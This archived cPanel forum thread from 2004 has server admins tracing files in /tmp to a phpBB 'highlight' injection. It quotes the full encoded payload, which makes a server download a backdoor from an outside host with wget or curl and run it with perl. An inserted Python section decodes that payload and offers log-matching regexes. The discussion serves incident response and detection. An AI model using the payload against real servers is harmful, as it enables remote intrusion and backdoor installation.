The Community Forums

Interact with an entire community of cPanel & WHM users!

Tracing source of items in /tmp

Discussion in 'General Discussion' started by hicom, Dec 5, 2004.

  1. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    I noticed a couple of items in /tmp that don't belong:

    -rw-r--r-- 1 nobody wheel 761 Dec 4 14:43 dc.pl.htm
    -rw-r--r-- 1 nobody wheel 761 Sep 30 11:12 dc.pl.htm.1
    -rw-r--r-- 1 nobody wheel 761 Sep 30 11:12 dc.pl.htm.2
    -rw-r--r-- 1 nobody wheel 761 Sep 30 11:12 dc.pl.htm.3

    So I wanted to trace them. Usually any hacking stuff that goes into /tmp must have been uploaded somehow through a domain, so I went to Apache's domain logs:

    /usr/local/apache/domlogs

    I did:

    > grep -r -i -n dc.pl ./

    But it didn't find any matches. Could there be another way these files have been uploaded to the server, or am I doing something wrong? I recall the grep method worked for me before, but this time I'm not getting any results.

    I'd like to trace the script to patch the domain / program that caused it.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    A couple of things:

    1. Is your nobody account in the wheel group? If it is it should not be!

    2. If you want to track files uploaded by PHP scripts (which they will be from unless you have suexec disabled) then you should run phpsuexec, unless you have a specific reason not to.
     
  3. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    >> 1. Is your nobody account in the wheel group? If it is it should not be!

    I might be somewhat crazy, but not that crazy :)

    >> 2. If you want to track files uploaded by PHP scripts (which they will be from unless you have suexec disabled) then you should run phpsuexec, unless you have a specific reason not to.

    Yeah, we're planning to roll out suPHP after the holiday season; we're just working out a plan to minimize the effect on some of the applications running on the server. Until then, I must find a way to track these ugly scripts. /tmp is secure anyway, so they are unable to execute, but I can't sleep knowing somewhere there is a way for some people to get in.
     
  4. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    Oh My God!

    Wow! I found it:

    /forum/viewtopic.php?t=144&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(99)%252echr(100)%252echr(122)%252echr(114)%252echr(48)%252echr(120)%252echr(46)%252echr(122)%252echr(105)%252echr(112)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(59)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(32)%252echr(99)%252echr(100)%252echr(122)%252echr(114)%252echr(48)%252echr(120)%252echr(46)%252echr(122)%252echr(105)%252echr(112)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(32)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527

    Someone used this on phpBB forum and this is the result:

    uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 wmail@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 naha@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 naha@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 naha@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim


    phpBB has an updated 2.0.11 version to hopefully resolve this.

    More info: http://www.phpbb.com/phpBB/viewtopic.php?p=1332159&highlight=252echr+99#1332159
     
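The decoding below is an added example and not part of the thread. It takes the `highlight` value quoted in post #4 verbatim, undoes the double URL encoding, turns the `chr()` calls into the shell command the attacker actually ran, and scans Apache combined-format log lines for requests of that shape. It also shows why the `grep -r -i -n dc.pl ./` from post #1 matched nothing: the file name never appears in the request, only as `chr(100)chr(99)chr(46)...`. The three log lines are constructed for the example (the client addresses are documentation addresses, the timestamps are made up); nothing here is code from cPanel, phpBB or mod_security.

```python
"""Decode the phpBB viewtopic.php 'highlight' payload and find it in domlogs.

Added example for this thread, not code from the original page. The HIGHLIGHT
constant is the value quoted in post #4; the log lines are constructed.
"""
import re
from urllib.parse import unquote

# The highlight parameter from post #4, copied verbatim and split for readability.
# Each %252e is a double-encoded '.', PHP's string concatenation operator.
HIGHLIGHT = (
    "%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)"           # echo
    "%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)"  # uncomeco;
    "%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)"    # uname -a;
    "%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(59)"  # cd /var/tmp/;
    "%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)"                      # wget
    "%252echr(99)%252echr(100)%252echr(122)%252echr(114)%252echr(48)%252echr(120)%252echr(46)%252echr(122)%252echr(105)%252echr(112)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)"  # cdzr0x.zip.net/
    "%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(59)"  # dc.pl.htm;
    "%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(111)%252echr(32)"  # curl -o
    "%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(32)"  # dc.pl.htm
    "%252echr(99)%252echr(100)%252echr(122)%252echr(114)%252echr(48)%252echr(120)%252echr(46)%252echr(122)%252echr(105)%252echr(112)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)"  # cdzr0x.zip.net/
    "%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(59)"  # dc.pl.htm;
    "%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)"                      # perl
    "%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(32)%252echr(59)"  # dc.pl.htm ;
    "%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)"                       # echo
    "%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527"          # unfim
)

# Constructed Apache combined-format lines (documentation IPs, invented times).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Dec/2004:14:43:10 -0500] "GET /forum/viewtopic.php?t=144&highlight='
    + HIGHLIGHT + ' HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [04/Dec/2004:14:40:02 -0500] "GET /forum/viewtopic.php?t=144&highlight=perl HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [04/Dec/2004:14:41:30 -0500] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

CHR_CALL = re.compile(r"chr\((\d+)\)")
# Matches the injection after ONE round of decoding (what a filter or a log
# grep sees): "%2esystem(" / ".system(" or a run of chr() calls joined by dots.
INJECTION = re.compile(r"(?:%2e|\.)system\(|(?:chr\(\d+\)(?:%2e|\.)?){3,}", re.I)
REQUEST = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def url_decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def decode_highlight(raw: str) -> str:
    """Recover the shell command hidden in the chr() calls of the payload."""
    php_expr = url_decode_fully(raw)  # "'.system(chr(101).chr(99)...).'"
    return "".join(chr(int(n)) for n in CHR_CALL.findall(php_expr))


def parse_request(log_line: str):
    """Return (client_ip, request_target) from a combined-format log line."""
    m = REQUEST.match(log_line)
    return (m.group(1), m.group(2)) if m else None


def find_injection_requests(log_lines):
    """Return (ip, path, decoded_command) for every request carrying the payload."""
    hits = []
    for line in log_lines:
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, target = parsed
        if INJECTION.search(unquote(target)):  # one decode round, like a WAF
            hits.append((ip, target.split("?", 1)[0], decode_highlight(target)))
    return hits


if __name__ == "__main__":
    print("attacker ran:", decode_highlight(HIGHLIGHT))
    for ip, path, cmd in find_injection_requests(SAMPLE_LOG):
        print(f"{ip} {path} -> {cmd}")
```

The decoded command fetches `dc.pl.htm` with wget or curl and then runs it with `perl dc.pl.htm`, which is exactly the interpreter case chirpy describes later in the thread: a noexec /tmp stops `./dc.pl.htm`, not `perl dc.pl.htm`. For the logs, grep for the encoded shape (`chr(` or `%2esystem`) rather than for the file name, and remember that any filter pattern has to match the request after a single round of URL decoding, where `%252e` has become `%2e`, not `.`.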
  5. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    Yeah there have been a few nasty phpbb/nuke bugs recently that allow for injection of commands. You may want to look into mod_security.
     
  6. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    We do have mod_security installed, but it didn't catch it.

    How could you block such an attack in mod_security?

    I tried:

    # Web-ATTACKS phpBB injections attempts
    SecFilter "chr\"

    but that didn't work.

    Thx
     
  7. fishfreek

    fishfreek Well-Known Member

    Joined:
    Jan 2, 2004
    Messages:
    238
    Likes Received:
    0
    Trophy Points:
    16
    I am extremely interested in what rules we can add to mod_security to stop this phpBB exploit. Regretfully we have a ton of idiots hosted on our servers who don't upgrade and don't bother to check for upgrades. I have set a deadline of midnight tomorrow for updating their forums or they will get suspended until they do update. I would like the mod_security module to act as a backup for protecting the server as a whole. The mod_security wget rule seems to work to some extent, but hackers are still putting files in /tmp and even /dev/shm/.

    Not sure how this is happening, as I have even run the securetmp script that I thought was to secure the tmp partition from having code that was executable.
     
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    That is not what noexec on a partition does. All that does is to prevent an executable from being run directly from the partition, it doesn't stop an executable being copied there and run through another method (e.g. a perl, PHP or shell script).

    Have you enabled php SUEXEC so at least if they are compromised, only their site will be trashed, rather than everyone else's? It's only one layer, but it should be one of the first things you look at. Of course, it only takes one local root exploit and your server is gone, so time is of the essence.
     
  9. fishfreek

    fishfreek Well-Known Member

    Joined:
    Jan 2, 2004
    Messages:
    238
    Likes Received:
    0
    Trophy Points:
    16
    I can't enable phpsuexec on that server because there is a client running VB3 and they are using the archive feature with it. Apparently the VB script is written so poorly the archive feature won't work with phpsuexec enabled. That is from info posted on their support forum.
     